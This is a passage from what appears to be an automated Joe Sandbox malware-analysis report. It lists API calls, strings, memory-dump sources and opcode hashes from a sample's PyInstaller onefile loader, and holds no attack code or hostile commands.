784->791 787->791 792 7ff7b2b7be1e-7ff7b2b7be26 788->792 793 7ff7b2b7bdc5 788->793 791->764 792->764 795 7ff7b2b7bdca-7ff7b2b7bdd1 793->795 796 7ff7b2b7be0d-7ff7b2b7be18 795->796 797 7ff7b2b7bdd3-7ff7b2b7bdd7 795->797 796->792 798 7ff7b2b7bdd9-7ff7b2b7bde0 797->798 799 7ff7b2b7bdf3 797->799 798->799 801 7ff7b2b7bde2-7ff7b2b7bde6 798->801 800 7ff7b2b7bdf9-7ff7b2b7be09 799->800 800->795 803 7ff7b2b7be0b 800->803 801->799 802 7ff7b2b7bde8-7ff7b2b7bdf1 801->802 802->800 803->792
APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0

Control-flow Graph

Strings
Similarity
• API ID: CurrentProcess
• String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
• API String ID: 2050909247-2434346643

Control-flow Graph

APIs
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0

Control-flow Graph

APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0

Control-flow Graph

APIs
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction ID: a8d0da6fc7cc23490c35671d922f1718aa0cc2bb46e130e0b14c67255762ad9d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E851FF2170F24146EF66B92D540077BE191AF667A4F484A35DF6D077EDEEBCD440C620

APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction ID: 4de386819421d88d66a667c305fdd340fcf208d6c4d4052a3c043b12b660e985
• Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
• Instruction Fuzzy Hash: C211B96160864141DA11AB2DA41416AB361AB66FF4F944335EF7D47BEDDEBCD051C700

APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
• GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
• Instruction ID: 7328b5335f14f978fadc7de4fc29c1b614f877a6a55733838be0f5b991dcf43c
• Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
• Instruction Fuzzy Hash: 05E04F10E0B20242FE4B7BBD984517BA2606FA6701FC44034CB0D862B9FDAC6851C730

APIs
• CloseHandle.KERNEL32(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABC6
• GetLastError.KERNEL32(?,?,?,00007FF7B2B7A9D5,?,?,00000000,00007FF7B2B7AA8A), ref: 00007FF7B2B7ABD0
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction ID: 59b5ef50c0d108ecc0d47cd08d1b9d63ba2930416399e5d6fe1886c0a2f4c0a0
• Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction Fuzzy Hash: BA21FC20F0A64241FAD7776D94403BBA2925FA67A0F840239DB2E477EDEEECE440C310

APIs
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction ID: 11e717803c3fe103e66090c19bca8d724c148768f7d4a34f0eb454ef87364c13
• Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
• Instruction Fuzzy Hash: 4741D83290A24187EA75BA1DA44017EF360EB67B50F940131DB8E476EDEFACE402CF60

APIs
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
• Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
• API ID: 00007B222F020
• String ID:
• API String ID: 2168931217-0
• Opcode ID: 7e0fdb752a10548c561c295598ecdd6ced2e369889b2766dece0c5918b55e072
• Instruction ID: 9aa5cbcab0c3cdcf195f9d082f0401883acac40005a7733eeaf3a44e03b73132
• Opcode Fuzzy Hash: 7e0fdb752a10548c561c295598ecdd6ced2e369889b2766dece0c5918b55e072
• Instruction Fuzzy Hash: 8A31A4A5F0D68142EE64CBD6B47013957A8EF8AFC0F481535EE4EA7B49DF2CE8418700
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _fread_nolock
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 840049012-0
                                                                                                                                                                                                                                    • Opcode ID: aa8733aac9d759589a50dfa5595dc90e342373a27925929eae3f9e33c74ff2d7
                                                                                                                                                                                                                                    • Instruction ID: c7b40a920e8ba4471ae5cea794db5af0772afda13ad2f2975ca09efdb3ec48fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa8733aac9d759589a50dfa5595dc90e342373a27925929eae3f9e33c74ff2d7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A621B421B1A65146FE12BA2A64043BBE651BF56BC4FC85D31EF0C4B78AEEBDE045C314
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                    • Instruction ID: 334d9ec49b9f0bec4668ba8a6a20c87f2549fad78403424e4908ab5d3a087571
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2231B422A1961185F6577B5D844037EB660AF62B61FC10135EB2D073FAEEFCA441CB31
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                                    • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                    • Instruction ID: f56cbef254075cacb59bf2bfae12ff5dbf098cdb6a0b6e40a100ed84839563cb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A21D172A06B4589FB22AF6CC0802ED33A0FB15718F840636D76C06BE9EFB8D544C750
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                    • Instruction ID: eed8ff58d0fa03ff6c16851f530fbb338976e11d3655b6aef7aea8bbb7898440
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E115321A2E64141EA62BF1D940057BE264AFA6B84FC44435EF5C5BABDEFBCD440C720
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                    • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                    • Instruction ID: 7543b3986f57d9dc492dd4784539977a39dca3dbd745c335bba1c435759a8885
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21C832A09A4186D762AF1CD44437AB6A0FBA9B54F98423CE76D4B6DDEF7CD401CB10
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 34be571ed70018cc70efd49e67833fe27543d6cd3aa336a63277aa2158903c60
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 7F01862161974140E905FB5E590116AE6A5BFA6FE0F8C4631DF6C17BEEEE7CD401C310

APIs
  • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
• LoadLibraryExW.KERNEL32(?,00007FF7B2B66476,?,00007FF7B2B6336E), ref: 00007FF7B2B68EA2
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
• Opcode ID: 21bc2cb28f6cff2a1fc1500461fc8769c892aca6a7c8e7e34e578de7ec179b05
• Instruction ID: 5b71553d5a7734892a3738002d3998ef058c378981572476ded0374d2097c216
• Opcode Fuzzy Hash: 21bc2cb28f6cff2a1fc1500461fc8769c892aca6a7c8e7e34e578de7ec179b05
• Instruction Fuzzy Hash: 46D08C01B2664542EA49B76BBA4666A9261AB9ABC0F98C035EF0D47B5EEC3CC0418B00

APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF7B2B70C90,?,?,?,00007FF7B2B722FA,?,?,?,?,?,00007FF7B2B73AE9), ref: 00007FF7B2B7D63A
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction ID: 5e07107eec4320a1f9bd7af0575cbdefb07424cbd607d856506c897e028c0d8c
• Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
• Instruction Fuzzy Hash: 36F03A11A0B24344FE563A7D580127691904FA67E0F880630DE2E852EAFEACE480C530

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
• Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: cb507049de633456afe1f32bf99a2bb64d7ed7002b7c7c3c0bbf6689f7aa8371
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 1DD1C731A0AA8285E712AF38E8542ABB760FF66758F840139DB5D876ACEF7CD144C710

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
• Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
Similarity
